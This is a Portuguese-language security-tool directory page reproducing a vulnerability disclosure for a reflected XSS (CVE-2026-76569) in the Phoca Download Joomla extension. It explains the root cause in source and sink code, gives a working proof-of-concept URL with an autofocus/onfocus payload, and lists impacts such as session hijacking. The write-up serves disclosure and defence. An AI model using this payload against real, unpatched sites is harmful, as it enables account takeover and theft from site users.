Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-76569 — Reflexão de XSS via parâmetro GET de pesquisa no Phoca Download | Kitploit
Ferramentas/GitHubGitHub/toanln-cov/cve-2026-76569
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubtoanln-cov/cve-2026-76569

CVE-2026-76569

Reflexão de XSS via parâmetro GET de pesquisa no Phoca Download

Ver Repositório
4há 20 diasAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

XSS Refletido via Parâmetro GET de Busca no Phoca Download

Phoca Download ≤ 6.1.4 — Atacante Autenticado Executa JavaScript Arbitrário via URL de Busca Manipulada no Painel de Controle do Usuário

CVE CVSS v4.0 CWE-79 Affected Researcher


RESUMO

O Phoca Download (com_phocadownload) para Joomla contém uma vulnerabilidade de Cross-Site Scripting (XSS) refletido na funcionalidade de busca de arquivos do Painel de Controle do Usuário. O parâmetro GET search é processado com o filtro 'string' do Joomla — que chama apenas e preserva o caractere — e depois é exibido sem em um atributo HTML . Um atacante pode injetar atributos HTML arbitrários e manipuladores de eventos que são executados no navegador da vítima ao carregar a página, sem exigir qualquer interação do usuário além de clicar em um link manipulado.

strip_tags()
"
htmlspecialchars()
<input value="">

VERSÕES AFETADAS

COMPONENTEVULNERÁVELTESTADO EMCORRIGIDO
com_phocadownload≤ 6.1.4Joomla 5 + PhocaDownload 6.1.4 + MariaDB 10.66.1.5

DETALHES DA VULNERABILIDADE

Tipo: Cross-Site Scripting Refletido (CWE-79) Autenticação necessária: Usuário Joomla registrado (logado) + Painel de Controle do Usuário habilitado (enable_user_cp = 1) Token CSRF necessário: Não — requisição GET, nenhum token CSRF é verificado neste caminho Arquivo de saída (sink): site/views/user/tmpl/default_files_bootstrap.php

Causa Raiz

O parâmetro search é lido usando o filtro 'string' do Joomla, que apenas chama strip_tags(). Isso preserva o caractere ", permitindo que um atacante escape do contexto do atributo value="" e injete atributos HTML arbitrários.

SITE/VIEWS/USER/VIEW.HTML.PHP:252 — FONTE (SOURCE)

root@kitploit:~
$search_files = $app->getUserStateFromRequest(
    $this->_context_files.'.search', 'search', '', 'string'
);
$search_files = StringHelper::strtolower($search_files);
$lists_files['search'] = $search_files;  // armazenado sem codificação

SITE/VIEWS/USER/TMPL/DEFAULT_FILES_BOOTSTRAP.PHP:56 — SAÍDA (SINK) (VULNERÁVEL)

root@kitploit:~
<input type="text" name="search" id="pdsearch"
    value="<?php echo $this->t['listsfiles']['search'];?>"
    class="form-control" />

A visão irmã phocadownloadlinkfile (mesma extensão) aplica corretamente PhocaDownloadUtils::filterValue($search, 'text') — equivalente a htmlspecialchars() — para o mesmo campo de busca. A visão user não aplica a mesma proteção, indicando codificação de saída inconsistente dentro da extensão.


PROVA DE CONCEITO

1. Faça Login como Usuário Registrado

Navegue até a página de login do Joomla e autentique-se como um usuário Registrado. Após o login bem-sucedido, o Joomla redireciona para a página de perfil do usuário, confirmando uma sessão ativa.

Login bem-sucedido como testuser — redirecionado para a página de perfil

2. Acesse o Painel de Controle do Usuário (Estado Inicial)

Navegue até o Painel de Controle do Usuário do PhocaDownload:

root@kitploit:~
http://TARGET/index.php?option=com_phocadownload&view=user

A página é renderizada com um campo de busca vazio (value=""). Este é o estado normal antes da injeção.

Painel de Controle do Usuário — campo de busca vazio, estado inicial

3. Envie URL Manipulada com Payload XSS

Navegue até a seguinte URL manipulada (ou digite o payload bruto diretamente na caixa de busca):

root@kitploit:~
http://TARGET/index.php?option=com_phocadownload&view=user&search=%22%20autofocus%20onfocus%3Dalert%28document.domain%29%20x%3D

URL manipulada com payload XSS enviada ao parâmetro de busca

Ao carregar a página, o atributo autofocus injetado foca o elemento de entrada, acionando imediatamente o manipulador de eventos onfocus. Nenhuma interação adicional do usuário é necessária.

HTML Renderizado (vulnerável):

root@kitploit:~
<input type="text" name="search" id="pdsearch"
  value="" autofocus onfocus=alert(document.domain) x="
  class="form-control" />

IMPACTO

  1. Sequestro de Sessão — Um atacante pode roubar o cookie de sessão do Joomla da vítima via document.cookie, permitindo a tomada total da conta sem credenciais.
  2. Execução de JavaScript Arbitrário — Qualquer JavaScript é executado na sessão do navegador da vítima — registro de teclas (keylogging), manipulação do DOM, coleta de credenciais e redirecionamentos para páginas de phishing são todos possíveis.
  3. Escalação de Privilégios — Se um administrador clicar no link manipulado enquanto autenticado, o atacante obtém execução de JavaScript em nível de administrador, potencialmente permitindo o comprometimento total do site por meio de ações no painel administrativo.

REFERÊNCIAS

  • CVE: https://www.cve.org/CVERecord?id=CVE-2026-76569
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-76569
  • GitHub Advisory: https://github.com/advisories/GHSA-99wr-9r6w-w242
  • Repositório do Fornecedor: https://github.com/PhocaDesign/PhocaDownload
Baixar ferramenta